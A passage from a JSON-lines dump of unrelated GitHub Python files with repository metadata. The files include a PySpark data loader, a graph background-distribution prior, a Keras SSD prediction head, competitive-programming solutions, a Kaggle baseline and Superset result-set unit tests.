datetime.utcfromtimestamp(1406855058),\n 'volume': 2447.37\n }\n self.assertEqual(volData[0], expectedVolFirst)\n expectedVolLast = {\n 'currency': 'navajo',\n 'time': datetime.utcfromtimestamp(1407375855),\n 'volume': 477.609\n }\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"gogogoutham/coinmarketcap-scraper","sub_path":"coinmarketcap.py","file_name":"coinmarketcap.py","file_ext":"py","file_size_in_byte":9691,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"61"} +{"seq_id":"38545361224","text":"from pyspark.sql import DataFrame\n\n\ndef load(type: str, df: DataFrame, target: str):\n \"\"\"\n Load Data to Database and Filesystem based on type\n :param type: Input Storage type (JDBC|CSV) Based on type data stored in MySQL or FileSystem\n :param df: Input Dataframe\n :param target:\n :return: Input target -For filesystem - Location where to store the data\n -For MySQL - table name\n \"\"\"\n\n driver_name = \"org.sqlite.JDBC\"\n url = \"jdbc:sqlite:/Users/Carballeira/sqlite/db/cctx.db\"\n\n if type == \"JDBC\":\n\n df.write.format(\"jdbc\")\\\n .mode(\"append\")\\\n .option(\"url\", url)\\\n .option(\"dbtable\", target)\\\n .option(\"driver\",driver_name)\\\n .save()\n\n print(f\"Data successfully loaded to SQLite Database !!\")\n\n if type == \"CSV\":\n # Write data on filesystem\n df.write.format(\"CSV\").mode(\"overwrite\").options(header=True).save(target)\n print(f\"Data successfully loaded to filesystem !!\")","repo_name":"adriancarballeira/moneytrackerapp","sub_path":"src/load.py","file_name":"load.py","file_ext":"py","file_size_in_byte":1002,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"183612984","text":"import time\nimport numpy as np\nimport pandas as pd\nfrom scipy import sparse\n\nfrom embedding.cne.degree_prior import BackgroundDistribution\n\n\nclass BgDistBuilder:\n @staticmethod\n def build(A, prior, block_mask=None, attributes=None):\n \"\"\"\n :param A: adjacency matrix, preferably CSR (compressed sparse row) matrix.\n :param prior: prior type.\n :param block_mask: indicates which block number each node in A belongs to.\n :param attributes: a list of |attribute_types| arrays that map nodes to the corresponding attribute values.\n Column sums will taken over nodes with identical attribute values.\n :return: the desired background distribution object (unfitted).\n \"\"\"\n if prior == 'degree' or prior == 'uniform':\n return BackgroundDistribution(A, prior)\n\n if prior == 'block':\n return BgDistBlock(A, block_mask)\n\n if prior == 'degree_per_block':\n return BgDistDegreeBlock(A, block_mask, attributes)\n\n if prior == 'degree_per_block_eco':\n from embedding.cne_recommender.bg_dist_partite_economical import BgDistDegreeBlockEco\n return BgDistDegreeBlockEco(A, block_mask)\n if prior == 'degree_per_block_eco_mem':\n from embedding.cne_recommender.bg_dist_partite_economical_memory_efficient import BgDistDegreeBlockEcoMemoryEfficient\n return BgDistDegreeBlockEcoMemoryEfficient(A, block_mask)\n\n raise ValueError('Prior {:s} is not implemented'.format(prior))\n\n\nclass BgDistBlockAbstract:\n def __init__(self, A, block_mask):\n self._A = sparse.csr_matrix(A)\n self._block_mask = block_mask\n\n def fit(self):\n \"\"\"\n Find the maximum entropy distribution, subject to the given constraints.\n \"\"\"\n raise NotImplementedError\n\n def get_probability(self, row_ids, col_ids):\n \"\"\"\n Compute P probability for the elements specified by row_ids 
and col_ids.\n :param row_ids: For every entry, its row index.\n :param col_ids: For every entry, its col index.\n :return: the probabilities of the specified elements in the fitted distribution.\n \"\"\"\n raise NotImplementedError\n\n def get_full_P_matrix(self):\n pass\n\n def set_full_P_matrix(self, P):\n pass\n\n\nclass BgDistBlock(BgDistBlockAbstract):\n # Constraint(s): total block sum.\n\n def __init__(self, A, block_mask):\n super(BgDistBlock, self).__init__(A, block_mask)\n\n # Count block sizes and number of blocks.\n part_nbs, self._part_counts = np.unique(self._block_mask, return_counts=True)\n self._nb_parts = part_nbs.shape[0]\n self.__part_density = np.zeros((self._nb_parts, self._nb_parts))\n\n def fit(self):\n for i in range(self._nb_parts):\n for j in range(self._nb_parts):\n # Collect all the rows from block i.\n rows = self._A[self._block_mask == i]\n\n # From those rows, collect the elements from block j.\n subA = rows[:, self._block_mask == j]\n\n n, m = subA.shape\n self.__part_density[i, j] = subA.count_nonzero() / (n * m)\n\n def get_probability(self, row_ids, col_ids):\n row_parts = self._block_mask[row_ids]\n col_parts = self._block_mask[col_ids]\n\n return self.__part_density[row_parts, col_parts]\n\n def get_row_probability(self, row_ids, col_ids):\n return self.get_probability(row_ids, col_ids)\n\n\nclass BgDistDegreeBlock(BgDistBlockAbstract):\n # Constraint(s): total block sum and total node degree.\n\n def __init__(self, A, block_mask, attributes=None):\n super(BgDistDegreeBlock, self).__init__(A, block_mask)\n self.__atttributes = attributes\n\n self.__P = None\n\n def fit(self):\n \"\"\"\n For now, this function was made as a basic example for priors that use attribute-wise sums. In the future,\n it should also be possible to extend to economical lambdas.\n Assumptions:\n - The network is undirected. (the whole matrix is computed, but the topright triangle is mirrored to the\n bottomleft at the end)\n - Attributes are only defined for rows, not columns. The sums are then taken over the columns.\n \"\"\"\n\n block_types = np.unique(self._block_mask)\n assert np.all(block_types == np.arange(block_types.shape[0]))\n\n P = np.empty(self._A.shape, dtype=np.float)\n P[:] = np.nan\n\n for type_i in range(block_types.shape[0]):\n row_mask = self._block_mask == type_i\n for type_j in range(type_i, block_types.shape[0]):\n col_mask = self._block_mask == type_j\n\n sub_A = self._A[np.ix_(row_mask, col_mask)]\n\n # First, check if the total sum is not just zero. 
In that case, we can avoid doing any calculations.\n total_sum = sub_A.count_nonzero()\n if total_sum == 0:\n P[np.ix_(row_mask, col_mask)] = 0.0\n P[np.ix_(col_mask, row_mask)] = 0.0\n continue\n\n # Lamdas aggregator keeps track of several 'lambdas' objects.\n lambdas = LambdasAggregator()\n\n # Define some functions to easily construct row and column lambdas.\n def construct_row_lambdas(row_mask_, col_mask_):\n sub_sub_A = sub_A[np.ix_(row_mask_, col_mask_)]\n\n # Compute the row sum for the given submatrix.\n # The expected row sum will have to match the actual sum.\n row_sums = sub_sub_A.sum(axis=1).A.squeeze()\n\n # Construct Lambdas object for the row degree prior.\n row_lambdas = RowDegreeLambdas(row_sums, row_mask_, col_mask_)\n lambdas.add_lambdas_object(row_lambdas)\n\n def construct_col_lambdas(row_mask_, col_mask_):\n sub_sub_A = sub_A[np.ix_(row_mask_, col_mask_)]\n\n # The col_sums are computed in a similar way.\n col_sums = sub_sub_A.sum(axis=0).A.squeeze()\n\n # Construct Lambdas object for the column degree prior.\n col_lambdas = ColumnDegreeLambdas(col_sums, row_mask_, col_mask_)\n lambdas.add_lambdas_object(col_lambdas)\n\n # Where the row and col masks are true, we build sub-masks of all ones.\n sub_full_row_mask = np.ones(np.sum(row_mask), dtype=np.bool)\n sub_full_col_mask = np.ones(np.sum(col_mask), dtype=np.bool)\n\n if self.__atttributes is None:\n construct_row_lambdas(sub_full_row_mask, sub_full_col_mask)\n construct_col_lambdas(sub_full_row_mask, sub_full_col_mask)\n\n else:\n already_a_full_row_constraint = False\n already_a_full_col_constraint = False\n for attribute_array in self.__atttributes.values():\n possible_values = pd.unique(attribute_array)\n for attribute_val in possible_values:\n if attribute_val == \"N/A\":\n continue\n\n sub_row_mask = attribute_array[row_mask] == attribute_val\n # If there are no attributed rows to sum over for the column lambda, then make sure that\n # there is a constraint that sums over all rows.\n if not np.any(sub_row_mask):\n if not already_a_full_col_constraint:\n construct_col_lambdas(sub_full_row_mask, sub_full_col_mask)\n already_a_full_col_constraint = True\n else:\n construct_col_lambdas(sub_row_mask, sub_full_col_mask)\n\n sub_col_mask = attribute_array[col_mask] == attribute_val\n if not np.any(sub_col_mask):\n if not already_a_full_row_constraint:\n construct_row_lambdas(sub_full_row_mask, sub_full_col_mask)\n already_a_full_row_constraint = True\n else:\n construct_row_lambdas(sub_full_row_mask, sub_col_mask)\n\n # Find lambda values using Newton optimization.\n P_sub = newton_optimization(lambdas, nit=100)\n\n P[np.ix_(row_mask, col_mask)] = P_sub\n P[np.ix_(col_mask, row_mask)] = P_sub.T\n\n self.__P = P\n\n def get_probability(self, row_ids, col_ids):\n return self.__P[row_ids, col_ids]\n\n def get_row_probability(self, row_ids, col_ids):\n return self.get_probability(row_ids, col_ids)\n\n def get_full_P_matrix(self):\n return self.__P\n\n def set_full_P_matrix(self, P):\n self.__P = P\n\n\ndef newton_optimization(lambdas, nit=100, tol=1e-8):\n alpha = 1.0\n prev_alpha = alpha\n P = None\n grad = None\n delta_la = None\n lagrangian = None\n start_time = time.time()\n for k in range(nit):\n # This is the first iteration, so calculate the initial values.\n if k == 0:\n E = lambdas.compute_E()\n lagrangian = lambdas.compute_lagrangian(E)\n P, grad, delta_la = lambdas.compute_P_and_grad(E)\n\n # Find the largest alpha that satisfies the first Wolfe condition.\n # This is done by halving alpha until it happens.\n 
while True:\n # Step in direction of gradient.\n lambdas.try_step(alpha)\n\n # Compute lagrangian with this alpha.\n E_try = lambdas.compute_E()\n lagrangian_try = lambdas.compute_lagrangian(E_try)\n\n # Check first Wolfe condition.\n if lagrangian_try <= lagrangian + 1e-4*alpha*(delta_la.dot(grad)):\n # print(\"lagrangian: \"+str(lagrangian_try)+\", alpha: \"+str(alpha))\n\n # Condition is satisfied, the recently tried values are taken as the new current values.\n E = E_try\n lagrangian = lagrangian_try\n lambdas.finalize_step()\n P, grad, delta_la = lambdas.compute_P_and_grad(E)\n break\n else:\n alpha /= 2\n if alpha < 1e-8:\n break\n\n # Some stop conditions.\n if np.linalg.norm(grad) / grad.shape[0] < tol or k >= nit - 1 or alpha < 1e-8:\n time_diff = time.time() - start_time\n print(\"Computed degree+block prior in \" + str(k+1) +\n \" iterations (\" + str(int(time_diff / 60)) + \"m \" + str(int(time_diff % 60)) + \"s).\")\n break\n\n # If the previous best alpha was the same as the current best alpha, then increase alpha.\n if prev_alpha == alpha:\n prev_alpha = alpha\n alpha = min(1.0, alpha*2)\n else:\n prev_alpha = alpha\n\n return P\n\n\nclass Lambdas:\n \"\"\"\n General class for Lagrange multipliers or 'lambdas'.\n \"\"\"\n def __init__(self):\n self.la = None\n self._delta_la = None\n self._backup_la = None\n\n def exponent_term(self):\n raise NotImplementedError\n\n def lagrangian_term(self):\n raise NotImplementedError\n\n def grad(self, partial_derivatives, P):\n raise NotImplementedError\n\n def try_step(self, alpha):\n if self._backup_la is None:\n self._backup_la = self.la\n self.la = self._backup_la + alpha * self._delta_la\n\n def finalize_step(self):\n self._delta_la = None\n self._backup_la = None\n\n\nclass RowDegreeLambdas(Lambdas):\n \"\"\"\n For the constraint where the expected row sum (for the submatrix specified by row_mask and col_mask) is equal to the\n actual sum.\n \"\"\"\n def __init__(self, degrees, row_mask, col_mask):\n super(RowDegreeLambdas, self).__init__()\n self.__degrees = degrees\n self.__row_mask = row_mask\n self.__col_mask = col_mask\n\n # Array of lambdas for row degrees.\n self.la = np.zeros(degrees.shape[0], dtype=np.float)\n\n # Initialization based on heuristics.\n P_estimate = (degrees + 1) / (np.sum(col_mask) + 1)\n self.la = np.log(P_estimate / (1 - P_estimate)) / 2\n\n def exponent_term(self):\n padded_la = np.zeros_like(self.__row_mask, dtype=np.float)\n padded_la[self.__row_mask] = self.la\n arranged_la = np.outer(padded_la, self.__col_mask)\n return arranged_la\n\n def lagrangian_term(self):\n return np.sum(self.la * self.__degrees)\n\n def grad(self, partial_derivatives, P):\n grad = (P.dot(self.__col_mask))[self.__row_mask] - self.__degrees\n hessian = (partial_derivatives.dot(self.__col_mask))[self.__row_mask]\n self._delta_la = -grad / (hessian + hessian.shape[0] * 1e-10)\n return self._delta_la, grad\n\n\nclass ColumnDegreeLambdas(Lambdas):\n \"\"\"\n For the constraint where the expected column sum (for the submatrix specified by row_mask and col_mask) is equal to\n the actual sum.\n \"\"\"\n def __init__(self, degrees, row_mask, col_mask):\n super(ColumnDegreeLambdas, self).__init__()\n self.__degrees = degrees\n self.__row_mask = row_mask\n self.__col_mask = col_mask\n\n # Array of lambdas for column degrees.\n self.la = np.zeros(degrees.shape[0], dtype=np.float)\n\n # Initialization based on heuristics.\n P_estimate = (degrees + 1) / (np.sum(row_mask) + 1)\n self.la = np.log(P_estimate / (1 - P_estimate)) / 2\n\n def 
exponent_term(self):\n padded_la = np.zeros_like(self.__col_mask, dtype=np.float)\n padded_la[self.__col_mask] = self.la\n return np.outer(self.__row_mask, padded_la)\n\n def lagrangian_term(self):\n return np.sum(self.la * self.__degrees)\n\n def grad(self, partial_derivatives, P):\n grad = (P.T.dot(self.__row_mask))[self.__col_mask] - self.__degrees\n hessian = (partial_derivatives.T.dot(self.__row_mask))[self.__col_mask]\n self._delta_la = -grad / (hessian + hessian.shape[0] * 1e-10)\n return self._delta_la, grad\n\n\nclass LambdasAggregator:\n \"\"\"\n Perform aggregation operations on the lambdas objects. It is assumed that every element follows an independent\n Bernoulli distribution.\n \"\"\"\n def __init__(self):\n self._lambdas_list = []\n self._backup_vals = None\n\n def add_lambdas_object(self, lambdas):\n assert isinstance(lambdas, Lambdas)\n self._lambdas_list.append(lambdas)\n\n def compute_E(self):\n exponent = 0\n for lambdas in self._lambdas_list:\n exp_term = lambdas.exponent_term()\n exponent += exp_term\n return np.exp(exponent)\n\n def compute_lagrangian(self, E):\n lag = np.log(self._Z(E))\n lag = np.sum(lag)\n for lambdas in self._lambdas_list:\n lag -= lambdas.lagrangian_term()\n return lag\n\n def compute_P_and_grad(self, E):\n Z = self._Z(E)\n P = E / Z\n partial_derivatives = E / (Z ** 2)\n\n delta_las = []\n grads = []\n for lambdas in self._lambdas_list:\n delta_la, grad = lambdas.grad(partial_derivatives, P)\n grads.append(grad)\n delta_las.append(delta_la)\n grad = np.concatenate(grads)\n delta_la = np.concatenate(delta_las)\n return P, grad, delta_la\n\n def try_step(self, alpha):\n for lambdas in self._lambdas_list:\n lambdas.try_step(alpha)\n\n def finalize_step(self):\n for lambdas in self._lambdas_list:\n lambdas.finalize_step()\n\n @staticmethod\n def _Z(E):\n \"\"\"\n Calculate the partition function Z(lambda).\n \"\"\"\n return 1 + E\n","repo_name":"aida-ugent/GraB","sub_path":"embedding/cne_recommender/bg_dist_partite.py","file_name":"bg_dist_partite.py","file_ext":"py","file_size_in_byte":15942,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"22004858013","text":"import sys; sys.stdin = open(\"input/1120.txt\", \"r\")\n\nA, B = input().split()\n\nresult = []\nfor i in range(len(B) - len(A) + 1):\n total = 0\n for j in range(len(A)):\n if A[j] != B[i + j]:\n total += 1\n result.append(total)\nprint(min(result))","repo_name":"vreez/APS","sub_path":"boj/boj_1120_문자열.py","file_name":"boj_1120_문자열.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23457955661","text":"\r\nmemory = {\r\n\t1: [0, 1],\r\n\t2: [1, 1],\r\n\t3: [1, 2],\r\n\t4: [2, 2],\r\n\t5: [2, 3],\r\n\t6: [3, 3],\r\n\t7: [3, 4],\r\n\t8: [4, 4],\r\n\t9: [4, 5]\r\n}\r\n\r\nt = int(input())\r\ncnt = 1\r\n\r\nwhile (t):\r\n\tx = int(input())\r\n\r\n\tli = list(input().split())\r\n\tli = [int(i) for i in li]\r\n\tliUnMod = [int(i) for i in li]\r\n\r\n\tarr9 = [float(\"inf\")]\r\n\tindex = 0\r\n\t\t\r\n\t# print(liUnMod)\r\n\r\n\tif li.count(9) is 1:\r\n\t\twhile any(i>1 for i in li):\r\n\t\t\tmaxEle = max(li)\r\n\t\r\n\t\t\tarr9.append(maxEle+ index)\r\n\t\t\tindex += 1\r\n\t\t\t\r\n\t\t\tif maxEle is 9:\r\n\t\t\t\tli.append(3)\r\n\t\t\t\tli.append(6)\r\n\t\t\telse:\r\n\t\t\t\tli.append(memory[maxEle][0])\r\n\t\t\t\tli.append(memory[maxEle][1])\r\n\t\t\t\r\n\t\t\ti = li.index(maxEle)\r\n\t\t\tdel(li[i])\r\n\t\t# print(\"Case #\"+ 
str(cnt) + \": \" + str(min(arr9)))\r\n\r\n\tli = liUnMod\r\n\tarr = [float(\"inf\")]\r\n\tindex = 0\r\n\t# print(li)\r\n\r\n\tif any(i>1 for i in li):\r\n\t\twhile any(i>1 for i in li):\r\n\t\t\tmaxEle = max(li)\r\n\t\r\n\t\t\tarr.append(maxEle+ index)\r\n\t\t\tindex += 1\r\n\t\t\t\r\n\t\t\tli.append(memory[maxEle][0])\r\n\t\t\tli.append(memory[maxEle][1])\r\n\t\t\t\r\n\t\t\ti = li.index(maxEle)\r\n\t\t\tdel(li[i])\r\n\r\n\t\tprint(\"Case #\"+ str(cnt) + \": \" + str(min(min(arr), min(arr9))))\r\n\t\t\t\r\n\telse:\t\t\r\n\t\tprint(\"Case #\"+ str(cnt) + \": 1\")\r\n\r\n\tt -= 1\r\n\tcnt += 1","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_156/1007.py","file_name":"1007.py","file_ext":"py","file_size_in_byte":1166,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39542762183","text":"import tensorflow as tf\nfrom keras.layers import Layer, Input, Conv2D, MaxPool2D, Activation\n\n@tf.keras.utils.register_keras_serializable()\nclass PredictionHead(Layer):\n \"\"\"Concatenate all feature maps for detection\n\n Args:\n Layer (_type_): _description_\n \"\"\"\n\n def __init__(self, last_dimension, **kwargs):\n super(PredictionHead, self).__init__(**kwargs)\n self.last_dimension = last_dimension\n\n def get_config(self):\n config = super(PredictionHead, self).get_config()\n config.update({\"last_dimension\": self.last_dimension})\n return config\n\n def call(self, inputs, *args, **kwargs):\n last_dimension = self.last_dimension\n batch_size = tf.shape(inputs[0])[0]\n\n outputs = []\n for conv_layer in inputs:\n outputs.append(tf.reshape(conv_layer, (batch_size, -1, last_dimension)))\n return tf.concat(outputs, axis=1)\n\ndef get_head_from_outputs(hyper_params, outputs):\n \"\"\"Produce ssd bounding boxes delta and label heads.\n\n Args:\n hyper_params (dictionary): _description_ outputs (list): _description_\n\n Outputs:\n pred_deltas (concenated bbox delta head) : \n pred_labels (concenated label head) : \n\n \"\"\"\n total_labels = hyper_params[\"total_labels\"]\n len_aspect_ratio = [len(x) + 1 for x in hyper_params[\"aspect_ratios\"]]\n labels_head = []\n bboxes_head = []\n for i, output in enumerate(outputs):\n ar = len_aspect_ratio[i]\n labels_head.append(Conv2D(ar * total_labels, (3, 3), padding=\"same\", name=\"conv_labels_{}\".format(i+1))(output))\n bboxes_head.append(Conv2D(ar * 4, (3, 3), padding=\"same\", name=\"conv_bboxes_{}\".format(i+1))(output))\n pred_labels = PredictionHead(total_labels, name=\"labels_head\")(labels_head)\n pred_labels = Activation(\"softmax\", name=\"conf\")(pred_labels)\n pred_deltas = PredictionHead(4, name=\"loc\")(bboxes_head)\n return pred_deltas, pred_labels\n","repo_name":"Muhammadiqbal-git/SSD_TF_SKRIPSI","sub_path":"Workspace/code/models/prediction_head.py","file_name":"prediction_head.py","file_ext":"py","file_size_in_byte":1959,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2467395960","text":"# -*- coding: utf-8 -*-\nimport pandas as pd\nimport os\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.svm import LinearSVC\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.metrics import accuracy_score, f1_score, classification_report, \\\n make_scorer\nfrom sklearn.model_selection import train_test_split\nimport numpy as np\n\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Activation, LSTM\n\nimport pickle\n\nDIR_JURE = 
'/media/interferon/44B681D7B681C9BE/kaggle/home-credit-default\\\n-risk-data'\n\ndef init():\n df_appl_test = pd.read_csv('application_test.csv')\n df_appl_train = pd.read_csv('application_train.csv')\n return df_appl_train, df_appl_test\n\n\n# Provjeri koj isu stupci categorical i koje vrijednosti primaju\ndef data_analysis(df_app_train):\n df_x = df_app_train.loc[:, df_app_train.columns != 'TARGET']\n\n for i in range(len(df_x.dtypes)):\n if df_x.dtypes[i] == object:\n print('===============')\n print('categorical col', df_x.columns[i])\n print('unique vals', set(list(df_x[df_x.columns[i]])))\n\n\ndef convert_cat_to_numer(df):\n for col_name in df.columns:\n if(df[col_name].dtype == 'object'):\n df[col_name]= df[col_name].astype('category')\n df[col_name] = df[col_name].cat.codes\n\n\ndef simple_baseline(df_app_train, df_app_test):\n print('> simple_baseline')\n print('df_app_train.shape', df_app_train.shape)\n print('df_app_test.shape', df_app_test.shape)\n \n convert_cat_to_numer(df_app_train)\n convert_cat_to_numer(df_app_test)\n \n df_x = df_app_train.loc[:, df_app_train.columns != 'TARGET']\n df_y = df_app_train['TARGET']\n \n df_x = df_x.as_matrix().astype(np.float)\n df_y = df_y.as_matrix().astype(np.float)\n \n df_x = np.nan_to_num(df_x)\n df_y = np.nan_to_num(df_y)\n \n x_train, x_test, y_train, y_test = train_test_split(df_x, df_y,\n test_size=0.2, random_state=42)\n \n clf = LinearSVC()\n clf.fit(x_train, y_train)\n pred = clf.predict(x_test)\n print('acc', accuracy_score(pred, y_test))\n print('f1', f1_score(pred, y_test, average = None))\n print('f1_macro', f1_score(pred, y_test, average = 'macro'))\n\n\nif __name__ == \"__main__\":\n os.chdir(DIR_JURE)\n\n df_app_train, df_app_test = init()\n #data_analysis(df_app_train)\n #simple_baseline(df_app_train, df_app_test)\n\n exit(0)\n ","repo_name":"jurebb/home-credit-default-risk","sub_path":"baseline.py","file_name":"baseline.py","file_ext":"py","file_size_in_byte":2481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2060415099","text":"def snail(array):\n if len(array) == 1: return array[0]\n arr = array[:]\n snail = []\n \n while len(arr) > 1:\n snail.extend(arr.pop(0))\n for i in range(0,len(arr)):\n snail.append(arr[i].pop())\n snail.extend(arr.pop()[::-1])\n for i in range(len(arr)-1,-1,-1):\n snail.append(arr[i].pop(0))\n \n if len(arr) > 0:\n snail.extend(arr[0])\n return snail\n\n\n# most clever\n\ndef snail(array):\n return list(array[0]) + snail(zip(*array[1:])[::-1]) if array else []","repo_name":"katielkrieger/algorithms","sub_path":"20170518_Snail_4kyu_Python/Snail.py","file_name":"Snail.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22328513367","text":"import turtle\r\ndef testDrive():\r\n turtle.forward(180)\r\n turtle.left(87)\r\n turtle.setheading(127)\r\n turtle.up()\r\n turtle.goto(50,40)\r\n turtle.home()\r\n turtle.down()\r\n turtle.circle(25)\r\ndef turtleState():\r\n v2 = turtle.isdown()\r\n v3 = turtle.heading()\r\n tXcor = turtle.xcor()\r\n tYcor = turtle.ycor()\r\n print(\"turtle is down?\", v2)\r\n print(\"turtle heading:\", v3)\r\n print(\"xcor: \",tXcor, \"ycor: \", tYcor)\r\ndef main():\r\n testDrive()\r\n turtleState()\r\n\r\nmain()\r\nprint (\"press Enter to continue...\")\r\n","repo_name":"GCIS-123-601/w2_lab1-A-Omar1","sub_path":"Omar_Abdelhamid_lab2_both programs.py","file_name":"Omar_Abdelhamid_lab2_both 
programs.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25168838645","text":"from datetime import datetime\n\nimport tests.integration_tests.test_app\nfrom superset.dataframe import df_to_records\nfrom superset.db_engine_specs import BaseEngineSpec\nfrom superset.result_set import dedup, SupersetResultSet\n\nfrom .base_tests import SupersetTestCase\n\n\nclass TestSupersetResultSet(SupersetTestCase):\n def test_dedup(self):\n self.assertEqual(dedup([\"foo\", \"bar\"]), [\"foo\", \"bar\"])\n self.assertEqual(\n dedup([\"foo\", \"bar\", \"foo\", \"bar\", \"Foo\"]),\n [\"foo\", \"bar\", \"foo__1\", \"bar__1\", \"Foo\"],\n )\n self.assertEqual(\n dedup([\"foo\", \"bar\", \"bar\", \"bar\", \"Bar\"]),\n [\"foo\", \"bar\", \"bar__1\", \"bar__2\", \"Bar\"],\n )\n self.assertEqual(\n dedup([\"foo\", \"bar\", \"bar\", \"bar\", \"Bar\"], case_sensitive=False),\n [\"foo\", \"bar\", \"bar__1\", \"bar__2\", \"Bar__3\"],\n )\n\n def test_get_columns_basic(self):\n data = [(\"a1\", \"b1\", \"c1\"), (\"a2\", \"b2\", \"c2\")]\n cursor_descr = ((\"a\", \"string\"), (\"b\", \"string\"), (\"c\", \"string\"))\n results = SupersetResultSet(data, cursor_descr, BaseEngineSpec)\n self.assertEqual(\n results.columns,\n [\n {\"is_dttm\": False, \"type\": \"STRING\", \"column_name\": \"a\", \"name\": \"a\"},\n {\"is_dttm\": False, \"type\": \"STRING\", \"column_name\": \"b\", \"name\": \"b\"},\n {\"is_dttm\": False, \"type\": \"STRING\", \"column_name\": \"c\", \"name\": \"c\"},\n ],\n )\n\n def test_get_columns_with_int(self):\n data = [(\"a1\", 1), (\"a2\", 2)]\n cursor_descr = ((\"a\", \"string\"), (\"b\", \"int\"))\n results = SupersetResultSet(data, cursor_descr, BaseEngineSpec)\n self.assertEqual(\n results.columns,\n [\n {\"is_dttm\": False, \"type\": \"STRING\", \"column_name\": \"a\", \"name\": \"a\"},\n {\"is_dttm\": False, \"type\": \"INT\", \"column_name\": \"b\", \"name\": \"b\"},\n ],\n )\n\n def test_get_columns_type_inference(self):\n data = [\n (1.2, 1, \"foo\", datetime(2018, 10, 19, 23, 39, 16, 660000), True),\n (3.14, 2, \"bar\", datetime(2019, 10, 19, 23, 39, 16, 660000), False),\n ]\n cursor_descr = ((\"a\", None), (\"b\", None), (\"c\", None), (\"d\", None), (\"e\", None))\n results = SupersetResultSet(data, cursor_descr, BaseEngineSpec)\n self.assertEqual(\n results.columns,\n [\n {\"is_dttm\": False, \"type\": \"FLOAT\", \"column_name\": \"a\", \"name\": \"a\"},\n {\"is_dttm\": False, \"type\": \"INT\", \"column_name\": \"b\", \"name\": \"b\"},\n {\"is_dttm\": False, \"type\": \"STRING\", \"column_name\": \"c\", \"name\": \"c\"},\n {\"is_dttm\": True, \"type\": \"DATETIME\", \"column_name\": \"d\", \"name\": \"d\"},\n {\"is_dttm\": False, \"type\": \"BOOL\", \"column_name\": \"e\", \"name\": \"e\"},\n ],\n )\n\n def test_is_date(self):\n data = [(\"a\", 1), (\"a\", 2)]\n cursor_descr = ((\"a\", \"string\"), (\"a\", \"string\"))\n results = SupersetResultSet(data, cursor_descr, BaseEngineSpec)\n self.assertEqual(results.is_temporal(\"DATE\"), True)\n self.assertEqual(results.is_temporal(\"DATETIME\"), True)\n self.assertEqual(results.is_temporal(\"TIME\"), True)\n self.assertEqual(results.is_temporal(\"TIMESTAMP\"), True)\n self.assertEqual(results.is_temporal(\"STRING\"), False)\n self.assertEqual(results.is_temporal(\"\"), False)\n self.assertEqual(results.is_temporal(None), False)\n\n def test_dedup_with_data(self):\n data = [(\"a\", 1), (\"a\", 2)]\n cursor_descr = ((\"a\", 
\"string\"), (\"a\", \"string\"))\n results = SupersetResultSet(data, cursor_descr, BaseEngineSpec)\n column_names = [col[\"column_name\"] for col in results.columns]\n self.assertListEqual(column_names, [\"a\", \"a__1\"])\n\n def test_int64_with_missing_data(self):\n data = [(None,), (1239162456494753670,), (None,), (None,), (None,), (None,)]\n cursor_descr = [(\"user_id\", \"bigint\", None, None, None, None, True)]\n results = SupersetResultSet(data, cursor_descr, BaseEngineSpec)\n self.assertEqual(results.columns[0][\"type\"], \"BIGINT\")\n\n def test_data_as_list_of_lists(self):\n data = [[1, \"a\"], [2, \"b\"]]\n cursor_descr = [\n (\"user_id\", \"INT\", None, None, None, None, True),\n (\"username\", \"STRING\", None, None, None, None, True),\n ]\n results = SupersetResultSet(data, cursor_descr, BaseEngineSpec)\n df = results.to_pandas_df()\n self.assertEqual(\n df_to_records(df),\n [{\"user_id\": 1, \"username\": \"a\"}, {\"user_id\": 2, \"username\": \"b\"}],\n )\n\n def test_nullable_bool(self):\n data = [(None,), (True,), (None,), (None,), (None,), (None,)]\n cursor_descr = [(\"is_test\", \"bool\", None, None, None, None, True)]\n results = SupersetResultSet(data, cursor_descr, BaseEngineSpec)\n self.assertEqual(results.columns[0][\"type\"], \"BOOL\")\n df = results.to_pandas_df()\n self.assertEqual(\n df_to_records(df),\n [\n {\"is_test\": None},\n {\"is_test\": True},\n {\"is_test\": None},\n {\"is_test\": None},\n {\"is_test\": None},\n {\"is_test\": None},\n ],\n )\n\n def test_nested_types(self):\n data = [\n (\n 4,\n [{\"table_name\": \"unicode_test\", \"database_id\": 1}],\n [1, 2, 3],\n {\"chart_name\": \"scatter\"},\n ),\n (\n 3,\n [{\"table_name\": \"birth_names\", \"database_id\": 1}],\n [4, 5, 6],\n {\"chart_name\": \"plot\"},\n ),\n ]\n cursor_descr = [(\"id\",), (\"dict_arr\",), (\"num_arr\",), (\"map_col\",)]\n results = SupersetResultSet(data, cursor_descr, BaseEngineSpec)\n self.assertEqual(results.columns[0][\"type\"], \"INT\")\n self.assertEqual(results.columns[1][\"type\"], \"STRING\")\n self.assertEqual(results.columns[2][\"type\"], \"STRING\")\n self.assertEqual(results.columns[3][\"type\"], \"STRING\")\n df = results.to_pandas_df()\n self.assertEqual(\n df_to_records(df),\n [\n {\n \"id\": 4,\n \"dict_arr\": '[{\"table_name\": \"unicode_test\", \"database_id\": 1}]',\n \"num_arr\": \"[1, 2, 3]\",\n \"map_col\": \"{'chart_name': 'scatter'}\",\n },\n {\n \"id\": 3,\n \"dict_arr\": '[{\"table_name\": \"birth_names\", \"database_id\": 1}]',\n \"num_arr\": \"[4, 